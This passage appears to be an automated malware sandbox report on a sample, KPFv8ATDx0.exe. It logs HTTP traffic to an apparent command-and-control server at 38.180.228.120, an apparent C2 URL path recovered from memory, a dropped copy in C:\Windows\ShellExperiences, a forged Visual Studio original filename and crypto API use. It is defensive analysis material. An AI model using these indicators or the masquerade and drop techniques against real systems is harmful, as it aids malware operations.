2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:46 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 36 3a 30 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:56:08 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1443752211.000000000325A000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1575711347.0000000003576000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1687002549.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1826603287.0000000003882000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1931052438.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2055005973.000000000290C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2158413526.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2284751701.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2425833967.000000000368A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.180.228.120
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2425833967.000000000368A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.180.228.120/cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLoca
                            Source: KPFv8ATDx0.exe, 00000000.00000002.1338858265.0000000003270000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1443752211.000000000325A000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1575711347.0000000003576000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1687002549.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1826603287.0000000003882000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1931052438.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2055005973.000000000290C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2158413526.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2284751701.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2425833967.000000000368A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Windows\ShellExperiences\oqWNZWQNWoNnROlqjKcKhLM.exeJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Windows\ShellExperiences\oqWNZWQNWoNnROlqjKcKhLM.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Windows\ShellExperiences\0b77faa1f189a8Jump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC550D680_2_00007FFAAC550D68
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC704CF80_2_00007FFAAC704CF8
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC7055F00_2_00007FFAAC7055F0
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC703EFA0_2_00007FFAAC703EFA
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC705FB00_2_00007FFAAC705FB0
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC6F000A0_2_00007FFAAC6F000A
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC7058080_2_00007FFAAC705808
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC6F629D0_2_00007FFAAC6F629D
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC704AE00_2_00007FFAAC704AE0
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC7053D40_2_00007FFAAC7053D4
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAACCA35C00_2_00007FFAACCA35C0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC580D687_2_00007FFAAC580D68
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC734CF87_2_00007FFAAC734CF8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC7355F07_2_00007FFAAC7355F0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC735FB07_2_00007FFAAC735FB0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC73408D7_2_00007FFAAC73408D
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC72000B7_2_00007FFAAC72000B
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC734AE07_2_00007FFAAC734AE0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC7263007_2_00007FFAAC726300
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC7353D37_2_00007FFAAC7353D3
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAACCD194F7_2_00007FFAACCD194F
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAACCDAFA27_2_00007FFAACCDAFA2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAACCD9B4A7_2_00007FFAACCD9B4A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAACCE61D27_2_00007FFAACCE61D2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAACCD93CD7_2_00007FFAACCD93CD
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC5B0D6814_2_00007FFAAC5B0D68
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC764CF814_2_00007FFAAC764CF8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC7655F014_2_00007FFAAC7655F0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC765FB014_2_00007FFAAC765FB0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC763EFA14_2_00007FFAAC763EFA
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC76580814_2_00007FFAAC765808
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC75000B14_2_00007FFAAC75000B
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC75629D14_2_00007FFAAC75629D
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC764AE014_2_00007FFAAC764AE0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC7642FB14_2_00007FFAAC7642FB
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC7653D414_2_00007FFAAC7653D4
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC7643FB14_2_00007FFAAC7643FB
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0194F14_2_00007FFAACD0194F
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0AFA214_2_00007FFAACD0AFA2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD09B8B14_2_00007FFAACD09B8B
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD161D214_2_00007FFAACD161D2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0940B14_2_00007FFAACD0940B
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC650D6820_2_00007FFAAC650D68
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC804CF820_2_00007FFAAC804CF8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC8055F020_2_00007FFAAC8055F0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC805FB020_2_00007FFAAC805FB0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC803EFA20_2_00007FFAAC803EFA
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC80580820_2_00007FFAAC805808
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC7F000B20_2_00007FFAAC7F000B
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC7F629D20_2_00007FFAAC7F629D
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC804AE020_2_00007FFAAC804AE0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC8053D320_2_00007FFAAC8053D3
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAACDA194F20_2_00007FFAACDA194F
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAACDAAFA220_2_00007FFAACDAAFA2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAACDA9B4A20_2_00007FFAACDA9B4A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAACDB61D220_2_00007FFAACDB61D2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAACDA93CD20_2_00007FFAACDA93CD
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC64F51026_2_00007FFAAC64F510
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC640D6826_2_00007FFAAC640D68
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC7F4CF826_2_00007FFAAC7F4CF8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC7F55F026_2_00007FFAAC7F55F0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC7F5FB026_2_00007FFAAC7F5FB0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC7F3EFA26_2_00007FFAAC7F3EFA
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC7F580826_2_00007FFAAC7F5808
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC7E000B26_2_00007FFAAC7E000B
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC7F4AE026_2_00007FFAAC7F4AE0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC7F42FB26_2_00007FFAAC7F42FB
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC7F53D326_2_00007FFAAC7F53D3
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAACD9194F26_2_00007FFAACD9194F
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAACD9AFA226_2_00007FFAACD9AFA2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAACD99B4A26_2_00007FFAACD99B4A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAACDA61D226_2_00007FFAACDA61D2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAACD993CD26_2_00007FFAACD993CD
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC69A1E134_2_00007FFAAC69A1E1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC6AA36634_2_00007FFAAC6AA366
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC650D6834_2_00007FFAAC650D68
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC65F4F934_2_00007FFAAC65F4F9
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC66B69D34_2_00007FFAAC66B69D
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC83A69F34_2_00007FFAAC83A69F
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC830D5834_2_00007FFAAC830D58
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC83E14334_2_00007FFAAC83E143
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC8324D434_2_00007FFAAC8324D4
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC8325FA34_2_00007FFAAC8325FA
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC83244034_2_00007FFAAC832440
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC830C7034_2_00007FFAAC830C70
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81E94834_2_00007FFAAC81E948
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81E9D834_2_00007FFAAC81E9D8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81E9E834_2_00007FFAAC81E9E8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81EA2834_2_00007FFAAC81EA28
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81F34A34_2_00007FFAAC81F34A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81E74034_2_00007FFAAC81E740
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81E89034_2_00007FFAAC81E890
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC804CF834_2_00007FFAAC804CF8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC8055F034_2_00007FFAAC8055F0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC805FB034_2_00007FFAAC805FB0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC803EFA34_2_00007FFAAC803EFA
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC80580834_2_00007FFAAC805808
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC7F000B34_2_00007FFAAC7F000B
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC7F629D34_2_00007FFAAC7F629D
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC804AE034_2_00007FFAAC804AE0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC8053D334_2_00007FFAAC8053D3
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAACDA194F34_2_00007FFAACDA194F
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAACDAAFA234_2_00007FFAACDAAFA2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAACDA9B4A34_2_00007FFAACDA9B4A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAACDB61D234_2_00007FFAACDB61D2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAACDA93CD34_2_00007FFAACDA93CD
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ACAUZvYN.log 80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                            Source: KPFv8ATDx0.exe, 00000000.00000000.1295138767.00000000003A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs KPFv8ATDx0.exe
                            Source: KPFv8ATDx0.exe, 00000000.00000002.1355176832.000000001C0C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs KPFv8ATDx0.exe
                            Source: KPFv8ATDx0.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs KPFv8ATDx0.exe
                            Source: KPFv8ATDx0.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: KPFv8ATDx0.exe, Va3hUK9lmuW7m1ZiFxJ.csCryptographic APIs: 'CreateDecryptor'
                            Source: KPFv8ATDx0.exe, Va3hUK9lmuW7m1ZiFxJ.csCryptographic APIs: 'CreateDecryptor'
                            Source: KPFv8ATDx0.exe, Va3hUK9lmuW7m1ZiFxJ.csCryptographic APIs: 'CreateDecryptor'
                            Source: KPFv8ATDx0.exe, Va3hUK9lmuW7m1ZiFxJ.csCryptographic APIs: 'CreateDecryptor'
